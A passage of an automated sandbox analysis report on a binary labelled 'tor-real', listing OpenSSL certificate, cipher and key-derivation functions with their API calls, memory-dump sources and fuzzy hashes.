                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: DigestInit_exO_ctrlO_freeX_new
                                                                            • String ID: $A$P
                                                                            • API String ID: 3525689870-3278419925
                                                                            • Opcode ID: 328e64a4cd7b3862ad4d9217b047978002bae15f3deefb093943e24feaf47207
                                                                            • Instruction ID: b27d999b021b470e078b68f357a047babda4d42c918f90f9dacbafad5991ad52
                                                                            • Opcode Fuzzy Hash: 328e64a4cd7b3862ad4d9217b047978002bae15f3deefb093943e24feaf47207
                                                                            • Instruction Fuzzy Hash: 4C12F4B06087459FD340DFA5C48479BBBF0AF88348F51892DE9A98B712D734E849CF92
                                                                            Function 6C0A6AF0 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • X509_STORE_CTX_new.LIBCRYPTO-1_1 ref: 6C0A6B4B
                                                                            • X509_STORE_CTX_init.LIBCRYPTO-1_1 ref: 6C0A6B71
                                                                            • X509_STORE_CTX_set_flags.LIBCRYPTO-1_1 ref: 6C0A6B93
                                                                            • X509_verify_cert.LIBCRYPTO-1_1 ref: 6C0A6B9B
                                                                            • X509_STORE_CTX_get1_chain.LIBCRYPTO-1_1 ref: 6C0A6BB1
                                                                            • OPENSSL_sk_shift.LIBCRYPTO-1_1 ref: 6C0A6BBD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6BC5
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6C31
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A6C50
                                                                            • X509_STORE_CTX_new.LIBCRYPTO-1_1 ref: 6C0A6C73
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6CAD
                                                                            • X509_STORE_new.LIBCRYPTO-1_1 ref: 6C0A6CD0
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6D08
                                                                            • X509_STORE_add_cert.LIBCRYPTO-1_1 ref: 6C0A6D1C
                                                                            • X509_STORE_free.LIBCRYPTO-1_1 ref: 6C0A6D3D
                                                                            • X509_STORE_CTX_free.LIBCRYPTO-1_1 ref: 6C0A6D49
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6D87
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DD7
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A6DE7
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A6DF6
                                                                            • X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0A6DFE
                                                                            • OPENSSL_sk_pop.LIBCRYPTO-1_1 ref: 6C0A6E13
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6E1B
                                                                            • X509_STORE_CTX_get1_chain.LIBCRYPTO-1_1 ref: 6C0A6E44
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A6F29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$L_sk_num$R_put_error$X509_freeX_get1_chainX_new$E_add_certE_freeE_newL_sk_popL_sk_pop_freeL_sk_shiftL_sk_valueX509_get_extension_flagsX509_verify_certX_freeX_initX_set_flags
                                                                            • String ID: A
                                                                            • API String ID: 1984016654-3554254475
                                                                            • Opcode ID: 707f11a59a33e0298fde05373143b88a1303b1aa09eaf9277a232cb95085bb85
                                                                            • Instruction ID: a33d85599e7594db0fcfb0fc8953c764db47411f538b15770819463b89fbedb9
                                                                            • Opcode Fuzzy Hash: 707f11a59a33e0298fde05373143b88a1303b1aa09eaf9277a232cb95085bb85
                                                                            • Instruction Fuzzy Hash: 0BB1E6B15493059FD700AFA9C18435EBBF0BF88348F51892DE9E48BB11D779E9468F82
                                                                            Function 6C0B86D0 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 385COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0A7170: EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0A717A
                                                                            • X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B870E
                                                                            • EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B8722
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8727
                                                                            • X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B873E
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B8755
                                                                            • EVP_PKEY_up_ref.LIBCRYPTO-1_1 ref: 6C0B875D
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0B87AA
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B87EF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B8827
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$R_clear_errorX509_check_private_keyX509_freeX509_get0_pubkeyY_copy_parametersY_freeY_idY_up_ref
                                                                            • String ID: A
                                                                            • API String ID: 3713628426-3554254475
                                                                            • Opcode ID: 55ab9b58d34bdd3c9744bea05f581d8278c102abfcc81632eb55386fbb676ca4
                                                                            • Instruction ID: 7228e8b88f2279c7d7af18dd092b5a2fdfbb8ed8b1e4f6867156548c6afbe0eb
                                                                            • Opcode Fuzzy Hash: 55ab9b58d34bdd3c9744bea05f581d8278c102abfcc81632eb55386fbb676ca4
                                                                            • Instruction Fuzzy Hash: F70206B46093069FD700DF29C084B5ABBF0BF88348F558A2EE494AB760D775E549CF86
                                                                            Function 6C0E0988 Relevance: 61.7, APIs: 31, Strings: 4, Instructions: 459COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0E0A47
                                                                            • COMP_CTX_new.LIBCRYPTO-1_1 ref: 6C0E0A60
                                                                            • EVP_CIPHER_CTX_reset.LIBCRYPTO-1_1 ref: 6C0E0AA5
                                                                            • COMP_CTX_free.LIBCRYPTO-1_1 ref: 6C0E0B44
                                                                            • COMP_CTX_new.LIBCRYPTO-1_1 ref: 6C0E0B5D
                                                                            • EVP_CIPHER_key_length.LIBCRYPTO-1_1 ref: 6C0E0BB2
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0BC0
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0BD6
                                                                            • memcpy.MSVCRT ref: 6C0E0C46
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0C52
                                                                            • EVP_PKEY_new_mac_key.LIBCRYPTO-1_1 ref: 6C0E0C7B
                                                                            • EVP_DigestSignInit.LIBCRYPTO-1_1 ref: 6C0E0CAD
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0E0CBD
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0CC9
                                                                            • EVP_CIPHER_flags.LIBCRYPTO-1_1 ref: 6C0E0CEA
                                                                            • EVP_CipherInit_ex.LIBCRYPTO-1_1 ref: 6C0E0D40
                                                                            • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0D68
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0E0E60
                                                                            • EVP_CIPHER_CTX_reset.LIBCRYPTO-1_1 ref: 6C0E0E78
                                                                              • Part of subcall function 6C0B5C20: EVP_MD_CTX_free.LIBCRYPTO-1_1(?,?,?,?,6C09FA64), ref: 6C0B5C32
                                                                              • Part of subcall function 6C0B5C20: EVP_MD_CTX_new.LIBCRYPTO-1_1(?,?,?,?,6C09FA64), ref: 6C0B5C3D
                                                                              • Part of subcall function 6C0B5C20: EVP_DigestInit_ex.LIBCRYPTO-1_1 ref: 6C0B5C5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_flags$X_new$X_free$DigestInit_exX_reset$CipherInitR_key_lengthSignX_ctrlY_freeY_new_mac_keymemcpy
                                                                            • String ID: !$A$P$w
                                                                            • API String ID: 1754963063-1903020143
                                                                            • Opcode ID: 94ffb991b0d5296557da4fba86e1ffaf70c0e73a59842126290302e80a244342
                                                                            • Instruction ID: e5706176f53a81fa12c409e3f952630d03a998e278c0947fe037477af516d31f
                                                                            • Opcode Fuzzy Hash: 94ffb991b0d5296557da4fba86e1ffaf70c0e73a59842126290302e80a244342
                                                                            • Instruction Fuzzy Hash: 1E2224B06497458FD700DF28C08475EBBE0BF88318F44896DE9A89B751DB79E948CF82
                                                                            Function 6C0A6576 Relevance: 45.6, APIs: 24, Strings: 2, Instructions: 131COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_s_file.LIBCRYPTO-1_1 ref: 6C0A6596
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C0A659E
                                                                            • OPENSSL_LH_new.LIBCRYPTO-1_1 ref: 6C0A65BC
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C0A65EE
                                                                            • PEM_read_bio_X509.LIBCRYPTO-1_1 ref: 6C0A661B
                                                                            • X509_get_subject_name.LIBCRYPTO-1_1 ref: 6C0A6633
                                                                            • X509_NAME_dup.LIBCRYPTO-1_1 ref: 6C0A6641
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0A6653
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A6665
                                                                            • OPENSSL_sk_new_null.LIBCRYPTO-1_1 ref: 6C0A6670
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A66A2
                                                                            • X509_NAME_free.LIBCRYPTO-1_1 ref: 6C0A66B3
                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-1_1 ref: 6C0A66C5
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A66CD
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A66D9
                                                                            • OPENSSL_LH_free.LIBCRYPTO-1_1 ref: 6C0A66E1
                                                                            • OPENSSL_LH_insert.LIBCRYPTO-1_1 ref: 6C0A6707
                                                                            • OPENSSL_sk_push.LIBCRYPTO-1_1 ref: 6C0A6713
                                                                            • BIO_free.LIBCRYPTO-1_1 ref: 6C0A672B
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0A6737
                                                                            • OPENSSL_LH_free.LIBCRYPTO-1_1 ref: 6C0A673F
                                                                            • ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0A6748
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0A677B
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0A6785
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_$E_freeH_freeO_freeR_put_errorX509_free$E_dupH_insertH_newH_retrieveL_sk_new_nullL_sk_pop_freeL_sk_pushM_read_bio_O_ctrlO_newO_s_fileR_clear_errorX509X509_get_subject_name__stack_chk_fail
                                                                            • String ID: A$l
                                                                            • API String ID: 1862454365-1005974064
                                                                            • Opcode ID: f4e4fe9d28a6e4819348908ca2ce5e539e19c96e7ffb415907855eaf1f590fb4
                                                                            • Instruction ID: 78491f227dd707111a484f0b9f9a67a53e4809b66b65d6a47260de20afe054c9
                                                                            • Opcode Fuzzy Hash: f4e4fe9d28a6e4819348908ca2ce5e539e19c96e7ffb415907855eaf1f590fb4
                                                                            • Instruction Fuzzy Hash: 1C5108B1548705CFD700AFE5C4803AEBFF4AF48358F52882CD5A897B11DB74A54A8B96
                                                                            Function 6C0B8E70 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 277COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$Y
                                                                            • API String ID: 0-593117144
                                                                            • Opcode ID: 07f23710b8226a4673707e1b5951e78c2c0419f57616bfbabce0ab7fe8889e90
                                                                            • Instruction ID: deb6b6e44dd816a5e208b72f52391e4fc9000f521a8f1a59a5b4651e685e34ba
                                                                            • Opcode Fuzzy Hash: 07f23710b8226a4673707e1b5951e78c2c0419f57616bfbabce0ab7fe8889e90
                                                                            • Instruction Fuzzy Hash: 3BB126B05087028FD300DF26C58435FBBF5AF89758F148A2EE498AB750E77AE5458F86
                                                                            Function 6C0D4770 Relevance: 40.5, APIs: 3, Strings: 20, Instructions: 228COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_ctrl.LIBCRYPTO-1_1(?,?,?,6C0D5264), ref: 6C0D47C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_ctrl
                                                                            • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $@$D$P$TLS 1.3, client CertificateVerify$TLS 1.3, server CertificateVerify
                                                                            • API String ID: 3605655398-2524163674
                                                                            • Opcode ID: 3e07d78e24589ac3922963dd1084ba65f81d598869151a986ae440ff7d47e1b1
                                                                            • Instruction ID: 6a09ea10b507810c6e7c2419ac8cdc4c3710d40fe2f46a7307e78d2cae406cee
                                                                            • Opcode Fuzzy Hash: 3e07d78e24589ac3922963dd1084ba65f81d598869151a986ae440ff7d47e1b1
                                                                            • Instruction Fuzzy Hash: C4B1E0B46043009FCB54CF69C4C0B1ABBF2BB99314F558A9EE8989B705D775E845CF82
                                                                            Function 6C0A8830 Relevance: 31.7, APIs: 21, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0A0DC0: qsort.MSVCRT ref: 6C0A0DE2
                                                                              • Part of subcall function 6C0A0DC0: qsort.MSVCRT ref: 6C0A0E06
                                                                              • Part of subcall function 6C0A0DC0: qsort.MSVCRT ref: 6C0A0E2A
                                                                            • OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A8879
                                                                            • EVP_get_cipherbyname.LIBCRYPTO-1_1 ref: 6C0A8881
                                                                            • OBJ_nid2sn.LIBCRYPTO-1_1 ref: 6C0A88E9
                                                                            • EVP_get_digestbyname.LIBCRYPTO-1_1 ref: 6C0A88F1
                                                                            • EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A896B
                                                                            • EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A899F
                                                                            • ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A89B3
                                                                            • EVP_PKEY_asn1_find_str.LIBCRYPTO-1_1 ref: 6C0A89F6
                                                                            • EVP_PKEY_asn1_get0_info.LIBCRYPTO-1_1 ref: 6C0A8A2A
                                                                            • ENGINE_finish.LIBCRYPTO-1_1 ref: 6C0A8A3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: qsort$E_finishJ_nid2snY_asn1_find_strY_asn1_get0_info$P_get_cipherbynameP_get_digestbyname
                                                                            • String ID:
                                                                            • API String ID: 3559210586-0
                                                                            • Opcode ID: 93b1045f4269f296233b080b6df282e58710327e6bbf081b706acf95cf1af7b9
                                                                            • Instruction ID: 9aa69f9fffc80b2f770471144f40c80ebf415ac6598a7dcd345489903f0244c2
                                                                            • Opcode Fuzzy Hash: 93b1045f4269f296233b080b6df282e58710327e6bbf081b706acf95cf1af7b9
                                                                            • Instruction Fuzzy Hash: 25A109B06093419FE7009FA5C58434BBBF0BB4A35CF148A1EE4949B691EB75D54ACF82
                                                                            Function 6C0B6070 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • o2i_SCT_LIST.LIBCRYPTO-1_1 ref: 6C0B60D8
                                                                            • SCT_LIST_free.LIBCRYPTO-1_1 ref: 6C0B60F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: T_freeo2i_
                                                                            • String ID: A
                                                                            • API String ID: 2437383209-3554254475
                                                                            • Opcode ID: 8328dee2cb5b23378bcabcbcc46d39df5972c92f98eb0d76c87a4faad83cf462
                                                                            • Instruction ID: 71c920d7eb7cb90141ee49591a02427586fad46bfe15763099f44ef0392843b5
                                                                            • Opcode Fuzzy Hash: 8328dee2cb5b23378bcabcbcc46d39df5972c92f98eb0d76c87a4faad83cf462
                                                                            • Instruction Fuzzy Hash: 37613BB0608B018FD700EF65C58079FBBE4AF88748F15882DE988DB741EB75E4848F92
                                                                            Function 6C0E0690 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 165COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_PKEY_CTX_new_id.LIBCRYPTO-1_1 ref: 6C0E06C0
                                                                            • EVP_PKEY_derive_init.LIBCRYPTO-1_1 ref: 6C0E06D2
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0706
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E073E
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E0772
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E07AA
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E07E2
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E081A
                                                                            • EVP_PKEY_CTX_ctrl.LIBCRYPTO-1_1 ref: 6C0E084E
                                                                            • EVP_PKEY_derive.LIBCRYPTO-1_1 ref: 6C0E086A
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0E08B1
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E08B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
